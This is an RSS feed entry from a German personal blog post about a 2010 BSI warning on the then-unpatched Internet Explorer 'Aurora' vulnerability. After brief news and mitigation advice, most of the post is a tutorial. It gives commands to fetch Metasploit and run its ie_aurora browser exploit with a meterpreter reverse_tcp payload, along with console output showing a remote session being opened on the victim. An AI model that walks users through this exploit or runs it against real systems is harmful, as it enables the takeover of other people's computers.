<?xml version="1.0" encoding="UTF-8"?> <rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" ><channel><title>monkey-business.biz &#187; BSI</title> <atom:link href="http://www.monkey-business.biz/tag/bsi/feed/" rel="self" type="application/rss+xml" /><link>http://www.monkey-business.biz</link> <description>Belästigung der Allgemeinheit - der private Weblog</description> <lastBuildDate>Tue, 24 Jan 2012 14:53:33 +0000</lastBuildDate> <language>en</language> <sy:updatePeriod>daily</sy:updatePeriod> <sy:updateFrequency>4</sy:updateFrequency> <item><title>BSI warnt: Internet Explorer Aurora Exploit</title><link>http://www.monkey-business.biz/459/bsi-warnt-internet-explorer-aurora-exploit/</link> <comments>http://www.monkey-business.biz/459/bsi-warnt-internet-explorer-aurora-exploit/#comments</comments> <pubDate>Wed, 20 Jan 2010 22:31:24 +0000</pubDate> <dc:creator>Loaden</dc:creator> <category><![CDATA[Belästigung der Allgemeinheit - mein privater Weblog]]></category> <category><![CDATA[Aurora]]></category> <category><![CDATA[BSI]]></category> <category><![CDATA[Exploit]]></category> <category><![CDATA[Internet Explorer]]></category> <category><![CDATA[Metasploit]]></category> <category><![CDATA[Tutorial]]></category><guid isPermaLink="false">http://www.monkey-business.biz/?p=459</guid> <description><![CDATA[Verspätet muss ich meine Freude über die Warnung des BSI vor dem Internet Explorer veröffentlichen. Der Fehler ist bisher noch ungepacht und das Exploit schon seit einiger Zeit online verfügbar. Es sind die Versionen 6 &#8211; 8 von Microsofts Internet Explorer betroffen. Laut heise.de wurden über diesen Schwachpunkt im Browser bereits gezielte Angriffe auf Google [...]]]></description> <content:encoded><![CDATA[<p>Verspätet muss ich meine Freude über die <a href="https://www.bsi.bund.de/cln_183/ContentBSI/Presse/Pressemitteilungen/Sicherheitsluecke_IE_150110.html" target="_blank">Warnung  des BSI</a> vor dem Internet Explorer veröffentlichen. Der Fehler ist bisher noch ungepacht und das Exploit schon seit einiger Zeit online verfügbar. Es sind die Versionen 6 &#8211; 8 von Microsofts Internet Explorer betroffen. Laut <a href="http://www.heise.de/newsticker/meldung/Luecke-im-Internet-Explorer-Gute-und-schlechte-Nachrichten-908167.html" target="_blank" title="heise.de">heise.de</a> wurden über diesen Schwachpunkt im Browser bereits gezielte Angriffe auf Google und andere amerikanische Firmen verübt. Microsoft selber empfiehlt die Sicherheitseinstellungen im Internet Explorer auf &#8220;hoch&#8221; zu stellen. Das deaktivieren von Javascript reicht jedoch aus um der Gefahr des Internet Explorer Aurora Exploit zu entgehen.  Inzwischen wurde das Exploit sogar in das Exploit Framework <a href="http://www.metasploit.com/" target="_blank">Metasploit</a> aufgenommen. Das Exploit aus dem Metasploit Framework ist nur beim Internet Explorer 6 funktional. Auf den Internet Explorer 7 sind trotz Protected Mode auch unter Windows Vista erfolgreiche Angriffe möglich.  In der achten Version des Internet Explorers verhindert DEP (Data Execution Prevention) das Ausführen des Schädlichen Quellcodes. Um das &#8220;Internet Explorer Aurora Exploit&#8221; in die Finger zu bekommen muss man sich den aktuellen Snapshot via Subversion herunterladen. Die aktuelle Download Version war zum Veröffentlichungszeitpunkt das Metasploit Framework 3.3.3. Der Downloadvorgang ist denkbar einfach und schnell:</p><div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">mkdir</span> METASPLOITORDNER
<span style="color: #7a0874; font-weight: bold;">cd</span> METASPLOITORDNER
<span style="color: #c20cb9; font-weight: bold;">svn</span> <span style="color: #c20cb9; font-weight: bold;">co</span> https:<span style="color: #000000; font-weight: bold;">//</span>www.metasploit.com<span style="color: #000000; font-weight: bold;">/</span>svn<span style="color: #000000; font-weight: bold;">/</span>framework3<span style="color: #000000; font-weight: bold;">/</span>trunk<span style="color: #000000; font-weight: bold;">/</span></pre></div></div><p>Das Aurora Exploit aus dem Metasploit Framework verwendet man folgendermaßen:</p><div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;">:~$ <span style="color: #7a0874; font-weight: bold;">cd</span> METASPLOITORDNER
:~$ msfconsole
msf <span style="color: #000000; font-weight: bold;">&gt;</span> use exploit<span style="color: #000000; font-weight: bold;">/</span>windows<span style="color: #000000; font-weight: bold;">/</span>browser<span style="color: #000000; font-weight: bold;">/</span>ie_aurora
msf exploit<span style="color: #7a0874; font-weight: bold;">&#40;</span>ie_aurora<span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000; font-weight: bold;">&gt;</span> <span style="color: #000000; font-weight: bold;">set</span> PAYLOAD windows<span style="color: #000000; font-weight: bold;">/</span>meterpreter<span style="color: #000000; font-weight: bold;">/</span>reverse_tcp
msf exploit<span style="color: #7a0874; font-weight: bold;">&#40;</span>ie_aurora<span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000; font-weight: bold;">&gt;</span> <span style="color: #000000; font-weight: bold;">set</span> LHOST <span style="color: #7a0874; font-weight: bold;">&#40;</span>deine IP<span style="color: #7a0874; font-weight: bold;">&#41;</span>
msf exploit<span style="color: #7a0874; font-weight: bold;">&#40;</span>ie_aurora<span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000; font-weight: bold;">&gt;</span> <span style="color: #000000; font-weight: bold;">set</span> URIPATH <span style="color: #000000; font-weight: bold;">/</span>
msf exploit<span style="color: #7a0874; font-weight: bold;">&#40;</span>ie_aurora<span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000; font-weight: bold;">&gt;</span> exploit</pre></div></div><div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #7a0874; font-weight: bold;">&#91;</span><span style="color: #000000; font-weight: bold;">*</span><span style="color: #7a0874; font-weight: bold;">&#93;</span> Exploit running <span style="color: #c20cb9; font-weight: bold;">as</span> background job.
<span style="color: #7a0874; font-weight: bold;">&#91;</span><span style="color: #000000; font-weight: bold;">*</span><span style="color: #7a0874; font-weight: bold;">&#93;</span> Started reverse handler on port <span style="color: #000000;">4444</span>
<span style="color: #7a0874; font-weight: bold;">&#91;</span><span style="color: #000000; font-weight: bold;">*</span><span style="color: #7a0874; font-weight: bold;">&#93;</span> Local IP: http:<span style="color: #000000; font-weight: bold;">//</span>192.168.2.101:<span style="color: #000000;">8080</span><span style="color: #000000; font-weight: bold;">/</span>
<span style="color: #7a0874; font-weight: bold;">&#91;</span><span style="color: #000000; font-weight: bold;">*</span><span style="color: #7a0874; font-weight: bold;">&#93;</span> Server started.</pre></div></div><p>Nach dieser Ausgabe landet man wieder an einer Eingabeaufforderung.</p><div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;">msf exploit<span style="color: #7a0874; font-weight: bold;">&#40;</span>ie_aurora<span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #000000; font-weight: bold;">&gt;</span></pre></div></div><p>Nun wird mit dem Internet Explorer Kontakt zur eigenen IP Adresse aufgenommen. Wenn der Exploit erfolgreich ausgeführt wird erscheint die Ausgabe:</p><div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #7a0874; font-weight: bold;">&#91;</span><span style="color: #000000; font-weight: bold;">*</span><span style="color: #7a0874; font-weight: bold;">&#93;</span> Sending stage <span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #000000;">723456</span> bytes<span style="color: #7a0874; font-weight: bold;">&#41;</span>
<span style="color: #7a0874; font-weight: bold;">&#91;</span><span style="color: #000000; font-weight: bold;">*</span><span style="color: #7a0874; font-weight: bold;">&#93;</span> Loaden session <span style="color: #000000;">1</span> opened <span style="color: #7a0874; font-weight: bold;">&#40;</span>192.168.2.101:<span style="color: #000000;">4444</span> -<span style="color: #000000; font-weight: bold;">&gt;</span> 192.168.0.2.101<span style="color: #7a0874; font-weight: bold;">&#41;</span></pre></div></div><p>Metasploit bietet nun die Möglichkeit die Kontrolle des Rechners zu übernehmen. Darauf werde ich hier jedoch nicht weiter eingehen. Es lässt sich hoffen das es demnächst ein Update für den Internet Explorer geben wird.</p> ]]></content:encoded> <wfw:commentRss>http://www.monkey-business.biz/459/bsi-warnt-internet-explorer-aurora-exploit/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> </channel> </rss>
<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced (User agent is rejected)
Database Caching 5/14 queries in 0.008 seconds using disk: basic

Served from: www.monkey-business.biz @ 2012-02-05 02:07:58 -->
